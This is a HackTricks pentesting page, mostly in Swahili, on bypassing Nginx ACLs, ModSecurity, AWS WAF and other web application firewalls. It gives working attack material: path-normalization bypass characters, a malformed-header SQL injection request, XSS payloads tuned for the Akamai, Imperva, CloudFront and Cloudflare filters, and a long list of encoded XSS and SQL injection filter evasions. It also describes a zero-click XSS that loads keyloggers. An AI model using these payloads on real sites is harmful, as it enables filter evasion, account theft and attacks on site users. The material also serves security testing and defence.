Proxy / WAF Protections Bypass

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Bypass Nginx ACL Rules with Pathname Manipulation

Mbinu kutoka kwenye utafiti huu.

Mfano wa sheria za Nginx:

location = /admin {
deny all;
}

location = /admin/ {
deny all;
}

Ili kuzuia bypasses, Nginx hufanya ukawaishaji wa njia (path normalization) kabla ya kuikagua. Hata hivyo, ikiwa seva ya nyuma itafanya ukawaishaji tofauti (kuondoa herufi ambazo nginx haitoi), inaweza kuwa inawezekana kupitisha ulinzi huu.

NodeJS - Express

Toleo la NginxNode.js Bypass Characters
1.22.0\xA0
1.21.6\xA0
1.20.2\xA0, \x09, \x0C
1.18.0\xA0, \x09, \x0C
1.16.1\xA0, \x09, \x0C

Flask

Toleo la NginxFlask Bypass Characters
1.22.0\x85, \xA0
1.21.6\x85, \xA0
1.20.2\x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.18.0\x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.16.1\x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B

Spring Boot

Toleo la NginxSpring Boot Bypass Characters
1.22.0;
1.21.6;
1.20.2\x09, ;
1.18.0\x09, ;
1.16.1\x09, ;

PHP-FPM

Marekebisho ya Nginx FPM:

location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

Nginx imewekwa ili kuzuia upatikanaji wa /admin.php lakini inawezekana kuipita kwa kufikia /admin.php/index.php.

Jinsi ya kuzuia

location ~* ^/admin {
deny all;
}

Bypass Mod Security Rules

Path Confusion

In this post imeelezea kwamba ModSecurity v3 (hadi 3.0.12), iliwekea vibaya variable REQUEST_FILENAME ambayo ilipaswa kuwa na path iliyofikiwa (mpaka mwanzoni mwa parameters). Hii ilikuwa kwa sababu ilifanya URL decode kupata path.
Kwa hiyo, ombi kama http://example.com/foo%3f';alert(1);foo= katika mod security litadhani kwamba path ni tu /foo kwa sababu %3f hubadilishwa kuwa ? ambayo inamaliza URL path, lakini kwa kweli path ambayo server itapokea itakuwa /foo%3f';alert(1);foo=.

Variables REQUEST_BASENAME na PATH_INFO pia ziliathiriwa na hitilafu hii.

Nambo sawa ilitokea kwenye toleo la 2 la Mod Security ambayo iliruhusu kupitisha ulinzi uliokuwa unizuia mtumiaji kufikia faili zenye extensions maalum zinazohusiana na backup (kama .bak) kwa kutuma dot ikiwa ime-URL encoded %2e, kwa mfano: https://example.com/backup%2ebak.

Bypass AWS WAF ACL

Malformed Header

This research inataja kwamba ilikuwa inawezekana kupitisha rules za AWS WAF zilizowekwa juu ya HTTP headers kwa kutuma header “malformed” ambayo haikuparsewa ipasavyo na AWS lakini ilipewa maana na backend server.

For example, sending the following request with a SQL injection in the header X-Query:

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

Ilikuwa inawezekana kuipita AWS WAF kwa sababu haikuweza kuelewa kwamba mstari ufuatao ni sehemu ya thamani ya header wakati server ya NODEJS ilitambua (hili lilirekebishwa).

Generic WAF bypasses

Mikomo ya Ukubwa wa Ombi

Commonly WAFs have a certain length limit of requests to check and if a POST/PUT/PATCH request is over it, the WAF won’t check the request.
Ukubwa wa juu wa mwili wa ombi la wavuti unaoweza kuchunguzwa kwa ajili ya ulinzi wa Application Load Balancer na AWS AppSync8 KB
Ukubwa wa juu wa mwili wa ombi la wavuti unaoweza kuchunguzwa kwa ajili ya ulinzi wa CloudFront, API Gateway, Amazon Cognito, App Runner, na Verified Access**64 KB

Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than 128 KB by turning off request body inspection, but these messages won’t be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:

If prevention mode: Inarekodi na kuzuia ombi.
If detection mode: Inachunguza hadi kikomo, inapuuzia sehemu iliyobaki, na inarekodi ikiwa Content-Length inapita kikomo.

By default, the WAF inspects only the first 8KB of a request. It can increase the limit up to 128KB by adding Advanced Metadata.

Up to 128KB.

Static assets inspection gaps (.js GETs)

Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with .js), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses.

Matumizi ya vitendo:

  • Tuma payloads katika headers zisizoaminika (mfano, User-Agent) kwenye GET kwenda kwenye path ya .js ili kuepuka ukaguzi wa maudhui, kisha omba mara moja HTML kuu ili kuathiri variant iliyokachwa.
  • Tumia IP safi/mbichi; mara IP inapofahamika, mabadiliko ya routing yanaweza kufanya mbinu hii isiwe ya kuaminika.
  • Katika Burp Repeater, tumia “Send group in parallel” (mtindo wa single-packet) kufanya mbio ya maombi mawili (.js kisha HTML) kupitia njia moja ya front-end.

This pairs well with header-reflection cache poisoning. See:

Cache Poisoning and Cache Deception

Obfuscation 

# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

Utangamano wa Unicode

Kulingana na utekelezaji wa Unicode normalization (maelezo zaidi here), herufi zinazoshiriki utangamano wa Unicode zinaweza bypass the WAF na execute kama payload iliyokusudiwa. Herufi zinazolingana zinaweza kupatikana here.

Mfano 

# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
<img src⁼p onerror⁼'prompt⁽1⁾'﹥  --> <img src=p onerror='prompt(1)'>

Kupitisha WAF za Muktadha kwa ukodishaji

Kama ilivyoelezwa katika this blog post, ili kupitisha WAF zinazoweza kuhifadhi muktadha wa input ya mtumiaji tunaweza kutumia mbinu za WAF ili kuifanya WAF ifanye normalization ya input ya mtumiaji.

Kwa mfano, katika post inataja kwamba Akamai URL decoded a user input 10 times. Kwa hiyo kitu kama <input/%2525252525252525253e/onfocus kitatambuliwa na Akamai kama <input/>/onfocus ambacho kinaweza kufikiri kuwa sawa kwa sababu tag imefungwa. Hata hivyo, mradi tu application haifanyi URL decode mara 10, mwathiriwa ataona kitu kama <input/%25252525252525253e/onfocus ambacho bado ni halali kwa shambulio la XSS.

Kwa hiyo, hili huruhusu kuficha payloads katika sehemu zilizo encoded ambazo WAF itazifungua na kutafsiri wakati mwathiriwa hatagundua.

Pia, hii haiwezi kufanyika tu na payloads zilizowekwa kwa URL bali pia na encodings nyingine kama unicode, hex, octal…

Katika post, bypasses za mwisho zilizo pendekezwa ni:

  • Akamai:akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>
  • Imperva:imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">
  • AWS/Cloudfront:docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>
  • Cloudflare:cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">

Pia imetajwa kwamba kutegemea jinsi WAF fulani inavyofahamu muktadha wa input ya mtumiaji, inaweza kuwa inawezekana kuitumia vibaya. Mfano uliopendekezwa kwenye blog ni kwamba Akamai iliruhusu kuweka chochote kati ya /* na */ (labda kwa sababu hii kawaida hutumika kama comments). Kwa hivyo, SQL injection kama /*'or sleep(5)-- -*/ haitagunduliwa na itakuwa halali kwani /* ni string ya kuanza ya injection na */ iko kama comment.

Aina hizi za matatizo ya muktadha zinaweza pia kutumika kudanganya udhaifu mwingine tofauti na ule ulio tarajiwa kufichuliwa na WAF (kwa mfano: hili linaweza kutumika pia kuziba XSS).

Mapengo ya ukaguzi wa kauli ya kwanza ya Inline JavaScript

Rulesets za ukaguzi wa inline zinaweza kuchanganua tamko la kwanza tu la JavaScript ndani ya event handler. Kwa kuweka msemo unaoonekana hauna hatari uliowekwa kwa mabano ukifuatiwa na semicolon (kwa mfano onfocus="(history.length);payload"), code ya mharifu iliyowekwa baada ya semicolon inapita ukaguzi wakati browser bado inaiendesha. Kuunganisha hili na focus inayosababishwa na fragment (mfano, kuongeza #forgot_btn ili kipengele kinacholengwa kiwe na focus wakati wa load) huruhusu XSS bila click ambayo inaweza papo hapo kuita $.getScript na kuanzisha tooling za phishing kama keyloggers. Angalia attribute-only login XSS case study iliyo tokana na this research.

H2C Smuggling

Upgrade Header Smuggling

IP Rotation

Regex Bypasses

Mbinu mbalimbali zinaweza kutumika kupitisha vichujio vya regex kwenye firewalls. Mifano ni pamoja na kubadilisha case kwa njia mizunguko, kuongeza line breaks, na encoding payloads. Rasilimali za bypass mbalimbali zinapatikana kwenye PayloadsAllTheThings na OWASP. Mifano hapa chini ilichukuliwa kutoka this article.

<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)

Zana

  • nowafpls: Kiendelezi cha Burp ambacho huongeza junk data kwenye requests ili bypass WAFs kwa kutumia urefu

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks